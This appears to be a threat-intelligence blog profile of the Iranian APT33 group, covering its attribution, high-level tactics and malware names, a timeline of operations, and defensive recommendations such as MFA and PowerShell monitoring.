Introduction
APT33 also called Elfin, Refined Kitten, and Magnallium is one of Iran’s most active and long-lasting cyber-espionage groups. The group has been operational since at least 2013 and has demonstrated persistence in campaigns against targets in the aerospace, energy, and defense industries. Analysts associate APT33 with Iran’s Islamic Revolutionary Guard Corps (IRGC) and the Ministry of Intelligence and Security (MOIS) and view its activities as consistent with Iran’s strategic and military ambitions. In the last ten years, APT33 has shifted from disruptive wiper attacks to more advanced, deliberate, and sustained espionage campaigns that are aligned with Tehran’s geopolitical objectives.
APT33’s activities are characteristic of a growing cyber maturity for the Iranian state, as well as its desire to make up for lack of conventional military capacity through asymmetric capabilities. The group is focused on intelligence collections operations, garnering economic advantage, and potentially conducting sabotage, which places it at the forefront of Iran’s cyber ecosystem along with groups such as APT34 (OilRig), APT35 (Charming Kitten), and APT39 (Chafer).
Identity and Motivation
APT33 is thought to act under the supervision of the IRGC and has ties to the Iranian state’s military and intelligence apparatus. Its campaigns demonstrate dual-purpose motivation:
1. Strategic Espionage: Compromising the networks of defense contractors, aerospace manufacturers, and energy industries to acquire sensitive data which can help Iran’s industrial and military efforts.
2. Economic and Political Influence: Disrupting or surveilling adversaries in the Gulf region and Western countries to obtain knowledge about: sanctions, energy production, and foreign policy.
The group’s main targets – defense and energy – are aligned with Iran’s strategic interests of protecting oil and gas interests, enhancing its missile and aerospace capabilities, and countering Western influence in the Middle East.
Tactics, Techniques, and Procedures (TTPs)
APT33 has displayed the characteristics of Iranian cyber-espionage through disciplined spearphishing, multi-stage intrusions, and a high reliance on private and open-source tools. Over time, it has adapted to add identity compromise and cloud persistence.
1. Initial Access
APT33 primarily obtains initial access using spearphishing emails that impersonate legitimate emails from corporate environments or informative emails regarding jobs with well-known aerospace and defense companies, such as Boeing or Northrop Grumman. Malicious attachments or links will deploy initial loaders that ultimately lead to backdoors being installed. APT33 also takes advantage of public-facing vulnerabilities and utilizes stolen credentials from previous breaches.
2. Persistence and Privilege Escalation
APT33 achieves persistence through web shells, scheduled tasks, and PowerShell-based backdoors. The group continuously reuses credentials and establishes active directory accounts for long-term persistent access to the network. APT33’s recent campaigns include evidence of malicious cloud-based persistence mechanisms via Azure Active Directory Applications.
3. Command and Control (C2)
APT33 utilizes HTTPS, DNS tunneling, and proxy servers located in the Middle East and Europe to facilitate command and control communications with compromised systems. This use of regionally hosted infrastructure helps to obfuscate attribution and enables continuity of operations.
4. Malware Arsenal
APT33 has a variety of tools comprised of wholly custom malware, and malware shared among the Iranian user base:
– DropShot: a loader that delivers additional payloads and maintains persistence.
– TurnedUp: a backdoor for exfiltration and monitoring.
– ALMA: an implant created in or around 2024 for espionage and exfiltration of credentials.
– Shamoon Association: the malware group behind the 2016 attacks that destroyed chunks of Saudi energy infrastructure.
– PowerShell Scripts: utilities used for reconnaissance, lateral movement, and credential exfiltration.
APT33’s modular architecture lends itself to flexibility and reuse of items developed previously in different campaigns.
5. Exfiltration and Destruction
Although its primary function appears to be espionage, APT33 has a history of conducting destruction of data. In certain events the actor deployed destructive disk wiping malware similar to Shamoon to wipe data and cause disruptions in critical infrastructure. Exfiltration of data appears normally over encrypted sessions (HTTPS) or through cloud above private or open servers.
Notable Operations
The operational history of APT33 (an Iranian state-sponsored actor) exhibits both sophistication and agility, which illustrates the manner in which Iranian threat actors evolve for national benefit.
- 2016 – Saudi Energy Attacks: Linked to destructive Shamoon-style incidents on Saudi petrochemical assets in a campaign. The intended objective was to quickly disrupt energy production in the region with elevated geopolitical tensions.
- 2018 – Aerospace Espionage Campaign: Executed phishing attacks to impersonate major aerospace and defense capabilities to supplant U.S. and European supply chains. This campaign was indicative of Iran’s interest in aerospace and missile capabilities.
- 2021 – Academic Espionage: Conducted operations targeting U.S. and European universities and research institutions engaged in aerospace and nuclear research likely for repurposing of stolen data for domestic defense projects in Iran.
- 2024 – ALMA Backdoor Deployment: Introduced a new PowerShell-based implant in operations targeting defense contractors and logistics firms in North America and the Gulf region.
- 2025 – Energy Sector Reconnaissance: Initiated campaigns targeting energy and oilfield service companies employing phishing and credentials harvesting to map industrial control networks.
These operations reflect a consistent focus on the energy and defense industries, to demonstrate long-term objectives around self-sustainability and strategic deterrence.
Evolution and Tradecraft
APT33’s development reflects the broader evolution in Iranian proxy activity from destructive cyber activity to an espionage and long-term access orientation. Early in their evolution, APT33’s campaigns were louder, easily attributable, and often left traces in network logs. Between 2023 and 2025, the group transitioned to quieter methods—exploiting identity-based attacks, using improved modular implants, and advancing operational security measures (OPSEC).
Some key trends in their evolution include:
– Operational Segmentation: an investigative or initial access team, a lateral movements team, and a C2 or infrastructure team segment the operation, which reduces exposure in each stage.
– Cloud Adoption: APT33 began leveraging Microsoft Azure and Microsoft 365 for persistence and lateral movement as a strategy that resembles the operational practice by both Russian and Chinese cyber gangs.
– Collaborating More: Sharing tools and infrastructure to coordinate attacks with APT34 and MuddyWater lends credibility to a unified Iranian cyber command.
– Intelligence Collection Focus: APT33 has progressed from outright destruction to strategic investments in intelligence and long-term collection with an eye towards geopolitical currency and leverage.
Strategic Impact and Defensive Recommendations
APT33’s ongoing targeting of energy and defense sectors demonstrates the geopolitical nature of cyber operations in relation to the cyber world. APT33’s activity telegrams Iran’s objectives of economic survival, regional influence, and technology parity against adversaries.
Strategic Impact:
• Intellectual Property Theft: Information obtained from aerospace and defense sectors could contribute to the expeditious execution of Iran’s domestic development programs.
• Threat to Critical Infrastructure: Targeting of the energy sector could allow for Iran’s pre-positioning of malware for future attacks and/or disruption.
• Regional Power Projection: APT33 operations support Iran’s asymmetric strategy by generating influence in regional issues while not having to engage in direct conflict with adversaries.
Defensive Recommendations:
1. Enhance Email Security: Utilize anti-phishing gate and also, sandboxing and user awareness training.
2. Implement Multi-Factor Authentication (MFA): Implement MFA for remote access and cloud services to mitigate credential theft.
3. Network Monitoring: Investigate anomalous PowerShell execution, lateral movement tools, and account creation of domain accounts.
4. Threat Hunting: Seek potential indicators of suspected perimeter compromises associated with DropShot, TurnedUp, and ALMA malware family groups and possible malware characteristics.
5. Information Sharing: Share information and develop a common understanding amongst the energy sector and defense sector regarding possible overlapping infrastructure linked to Iranian operations.
Conclusion
APT33 is still one of Iran’s most effective and enduring actors in cyber-espionage. A decade-long history reflects a disciplined and strategic mission to support Iran’s military and industrial interests in cyberspace. From the early, destructive Shamoon-style campaigns to its current focus on cloud-based espionage, APT33 continues to advance in sophistication and capability.
As we look forward to 2025, APT33 illustrates Iran’s transition from less mature cyber operations to more mature and intelligence-based operations. APT33 operates in the intersection of espionage, economic warfare, and geopolitical competition. For defenders, understanding APT33’s evolving tactics and establishing sufficient identity, email, and cloud security controls will be key to defending against one of the Middle East’s most prolific cyber threats.
You can download and review the sheet for all the details!
Threat.watch encouraging users to check their security score
